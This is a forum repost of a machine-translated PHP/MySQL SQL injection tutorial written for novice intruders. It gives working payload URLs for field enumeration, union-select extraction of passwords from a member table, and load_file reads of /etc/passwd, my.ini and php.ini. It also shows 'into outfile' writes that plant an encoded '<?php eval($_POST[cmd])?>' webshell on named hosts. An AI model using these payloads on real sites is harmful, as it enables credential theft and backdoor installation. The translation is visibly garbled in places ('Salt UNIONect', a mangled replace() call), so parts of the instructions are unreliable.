Jump to content
xTremeSurfer

Php injection tutorial!

Recommended Posts

Posted

Popular in this era of injection,How many rookie charge carrying tools around. If you do not want to become a tool of the slave,PHP do not want to shy away from face,Do not want to continue doing ASP rookie of the group,Do not want to……Then you stop and, As I finish this with the whole process of intrusion detection. I believe you must be able to gain something. Not only technically,More in the train of thought,More consciously..

Injection to determine whether there:First,PHP and ASP to judge the same way as injection,Followed by a dynamic connection and 1 = 1, and 1 = 2 to see the results returned to judge. Returns the results of two different,There can be judged as an initial injection point.

Determine the field size:Next,Php guess field methods to deal with,We use order by. Syntax:

code:http:/ / 127.0.0.1/1.php?id = 1 forrwhich city 40 / / If the return to normal,40 than the actual field that large. So we continue to increase. Has been added to the returned error.

code:For example, whenhttp://127.0.0.1/1.php?id=1 Therwhich city 4

5, when a mistake,So we know the field size is 44.

Salt UNIONect:Know the field size after,We use the union select query to list all the fields in the United.

code:http:/ / 127.0.0.1/1.php?id=1 and 1=2 union select 1,2,3,4 ~ 44 / * / / Here we list the 44 fields,And with / * tell MYSQL,Our orders have been implemented .*

You can echo out the appropriate fields,Replace the field name you want to query,And then from that. You can get the contents of the appropriate fields. For example,:

code:http:/ / 127.0.0.1/1.php?id=1and 1=2 union select 1,2,3,4,~30,passwd,32, ~ 45 from member / * / / ~ that I omitted here. You can then write.

MYSQL function of several commonly used:Well,Now we have to list the field. Estimate in respect of a hurry this time the increase was to guess the password from. In fact,The trick to guess the password to go back,We should at the end. Some people say that the function of MYSQL,And ACCESS as,Even less,This is actually a misunderstanding,Wronged MYSQL. We take a look below,MYSQL What are the use of advanced.

Here are a few commonly used in the first few Han:1:system_user()2:User()3:current_user4:session_user()5:database()6:Version()7:load_file()……Their meaning is as follows:

1:System user name .2:User Name .3:Current user name:4 .5 connect to the database user name:Database name .6:Database Version .7:MYSQL function to read local files

What is the use they have?The role of the following 1-6:

These functions turn back the information in the detection process has a very important role in,They understand the goals of our,Analysis of target,Looking for loopholes,Broadens the mind, and so have a great role. Such as understanding the system version,Know whether to support the union database,Whether the current user the user's initial judgments, etc. ROOT…7 The role of the function is even greater,The next single that we.

Specifically said load_file()Function and skills.

OK.load_file is used to read local files MYSQL,Will use the function. Permissions when we can read and write into file,load_file there is very great role. how are we to judge permission to do the injection point?Very simple,Added after the injection point and (saltect count(*) from mysql.user)> 0 / * If the results return to normal,It is read and write privileges. We can use this function to read a sensitive file system,To find the configuration file,Find a database connection file,Find social work files,WEB search for physical path and so on. The following,I will give you a list of sensitive documents summed up:

WINDOWS?:

load_file(char(99,58,47,119,105,110,100,111,119,115,47,112,104,112,46,105,110,105)) C:/ Windows / php.ini / / What's inside I do not say it?

load_file(char(99,58,47,119,105,110,110,116,47,112,104,112,46,105,110,105)) C:/ Winnt / php.ini

load_file(char(99,58,47,119,105,110,100,111,119,115,47,109,121,46,105,110,105)) C:/ Windows / my.ini / / administrator had MYSQL login password and user name will stay

load_file(char(99,58,47,119,105,110,110,116,47,109,121,46,105,110,105)) C:/winnt/my.ini

load_file(char(99,58,47,98,111,111,116,46,105,110,105)) C:/ Boot.ini

LUNIX/UNIX?:

load_file(char(47,101,116,99,47,112,97,115,115,119,111,114,100)) / Etc / password / / I do not say it?

load_file(char(47,117,115,114,47,108,111,99,97,108,47,104,116,116,112,100,47,99,111,110,102,47,104,116,116,112,100,46,99,111,110,102)) / Usr / local / httpd / conf / httpd.conf / / the default directory may be able to find a site Oh!

load_file(char(47,117,115,114,47,108,111,99,97,108,47,97,112,97,99,104,101,50,47,99,111,110,102,47,104,116,116,112,100,46,99,111,110,102)) / Usr/local/apache2/conf/httpd.conf / / default directory may be able to find a site Oh!

FreeBSD?:

load_file(char(47)) / / Lists the root directory of the FreeBSD system

About a friend called to see on here,This is what ah. Char()What is it?What is behind the long list of ah?(System do not understand do not need to ask,Themselves to GOOGLE).

Actually,Even if you have an injection point to read and write permissions,If you direct the implementation of load_file(C: Boot.ini),Echo can not generally,Encountered such a situation,You have two options to the path into 16 hex .1,Directly to the database, the path into the base 10 .2,With char()Function to restore back to the ASCII.

For example, c: Boot.ini,Band is converted to 16:"0x633A5C626F6F742E696E69",Then you directly load_file(0x633A5C626F6F742E696E69)On it. If the conversion is 10 decimal,It is:"99 58 92 98 111 111 116 46 105 110 105". You need to use char()To convert,Before conversion,TXT where you need to be a mass replacement,Spaces are converted to","Number. That:load_file(char(99,58,92,98,111,111,116,46,105,110,105)). Be careful not to expand the number less,Are symmetrical.

Here,Estimated that there are dishes to be called .. Dounong Well,Put there to enforce ah?!Do not worry,Take a look at Figure.

As long as the load_file()Field appears on the page,The best position to ensure there is sufficient showing the complete file you want to show. Is not enough tension in the location is not,Here I will teach you the recipe.

1:Sometimes,You obviously have recognized their right to read and write files,But he just can not read to file,Or blank. Why?Reason may be that the system configuration in the permission to do good,Your USER permissions,ADMINISTRATOR where he can not read the file. NTFS and LINUX can do it. If you exclude the above,You should consider,Did you read out the contents of the,By the browser as HTML,ASP,PHP,ASPX,JSP, etc. The scripting language to perform the?For example, if you read the contents out with<>Symbols,The browser will execute the contents of your file,Naturally you can not see anything. To deal with this situation,Is also very simple,We only those special symbols,When reading out,To replace them with other symbols,So that the browser will not execute them!How instead of????replace(load_file(A),char(B),char©)Function!When you read the file out of time A,If there are letters or symbols B,So MYSQL C letters or symbols will be used to replace B,Then displayed. OK. We put on such a:replaload_fileiae(A)),char(6charhar(32)). Here used as CHAR()Function is converted to the letter that if there"<"??,????????.??????????????.

2:All the fields are not enough positions echo location,Oh, read the file is incomplete,The above reasons are not,Then how do?Here we use Substring(st,pos,only)Function to solve the problem. What he means is the pos-bit from the string str from the return position of the substring len characters. For example Substring(load_file(a),50,100)A content is the 50th letter of the beginning echo 100 to you. Then we can echo Rights Piecewise Piecewise.

Advanced use into outfile!

OK.load_file()We say so much. Next,We have a lot to do to be the highlight of!Here,I would say very important to use the next method,Kim Sum is why I refer to several works focused on the technical part. When we are several conditions to determine the future:

1 to obtain the physical path(into outfile 'physical path') In order to write to the directory

2 able to use the union (That is more than the version required MYSQL3)

3, the other did not 'filter(Because the back outfile '' Can not be converted to other functions instead)

4 users have file_priv permission is MYSQL(Otherwise, can not write files or read the contents of the file)

5 on MS web directory has write access permissions to the system generally,But LINUX is usually rwxr-xr-x means that groups with other users do not have permission to write.

1 here, we generally can rely on the database error message to burst,No words,You can also load_file()To get .2 It is generally possible are rare on the ... 3'''.4 There is no permission filtering,We have already tested the .5 if you can not come back up to the site path,We also have other ways,For example, the starup,run in there, and so social workers approach. and generally try to upload directory and more,Photo Catalog,Or most of them have read and write permissions.

OK. Need to determine the conditions,Then how to use it?We separate the two for the use of.

Usage 1:This is the usage of law-abiding,We all know that. Is there a message using site,Upload and other functions,Get your horse up a word,Then use

code:http://www.tian6.com/coder.php?id=1 and 1=2 union select 1,load_file( /www/home/html/upload/qingyafengping.jpg),3,4,5,6 into outfile '/ www / home / html / coder.php' / * your pony was born.

Where / www / home / html / upload / qingyafengping.jpg to the address you have to upload Trojans to assume the existence of the field .3,4,5,6,/ Www / home / html / WEB path for the hypothetical.

Usage 2, is also a key to say. The above method,Limitations is still relatively large,If the site does not give you upload,Filter uploaded content or website,How to do that?Do not be afraid,Kenshin thought several years ago gave us a good idea. We only need to perform such a URL directly:

code:http:/ / tiany6.com and 1=2 union select 1,char(Here is the code for your horse,Remember turned into 10 or 16 into the),3,4,5,6 into outfile '/ www / home / html / coder.php' / * This is also the birth of your pony,Do not need to upload,He is not afraid filter.

For example

code:http:/ / tiany6.com and 1=2 union select 1,char(60,63,112,104,112,32,101,118,97,108,40,36,95,80,79,83,84,91,99,109,100,93,41,63,62),3,4,5,6 into outfile '/www/home/html/coder.php'/*

Or

tiany6.com and 1=2 union select 1,0x3C3F706870206576616C28245F504F53545B636D645D293F3E,3,4,5,6 into outfile '/www/home/html/coder.php'/*

Or

tiany6.com and 1=2 union select 1,'',3,4,5,6 into outfile '/www/home/html/coder.php'/*

3,4,5,6 to assume the existence of the field,/ Www / home / html / WEB path for the hypothetical.

Section summarizes the basis of:Good,I talked about the basics here. So when you have time to give us some some real testing. Of course,Simple question then will be a passing of the. Maybe you should ask,Why do I say in front of so many,Or the contents of the above,In fact, we carefully,Basically, can find relevant content online,Why do I have to say here?I'll give you the answer only two.

1:I have been advocating techniques to really understand the reasons,To know these things,Have to know why,Each issue will not be exactly the same,Each target will not be exactly the same,Every section of the day,There will be changes,To be really handy to do,Difficulties to solve their own,Must understand the principles of!Tools are written by,He can only be your helper. He will not adapt to the environment according to actual situation. Do you understand the principles of,You are a flexible and intelligent tool,Innovation can,Flexible and change. People move to live,Move trees S,However hard it hard to,Must always remind ourselves.

2:Relative to the side dishes were not based,Always difficult to quickly find the information they really help. Often spend considerable time and effort,Also get the wrong answer,Led astray.'re Starting a lot of people rely on tools. I am here to give you sum up down,You are learning fast,Not in the wrong direction. While many people are so over their own(I believe that many experts are pondering over their own,You have a hard time is the same.). Now you come to the days of Sun Forum,There is no one will charge you a penny,No one will ask you to add any VIP,Or to ask you to pay something. There are many people willing to create a better learning environment for you,Our forum administrator,Moderators are also shortcuts to help you on track as quickly as possible,This can be a good opportunity for their side dishes. Is what pains me the reason to write these articles. I want to see,The technical,Upward,Positive,Tianyang students in the right direction. OK. Nonsense stop here. Waste of time for you master.

Sursa PHP injection tutorial - Hyperblue's Blog - PHP MYSQL|Web Development|Plug-in Development|typo3|WordPress|magento|opencart|dedecms|discuz?

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...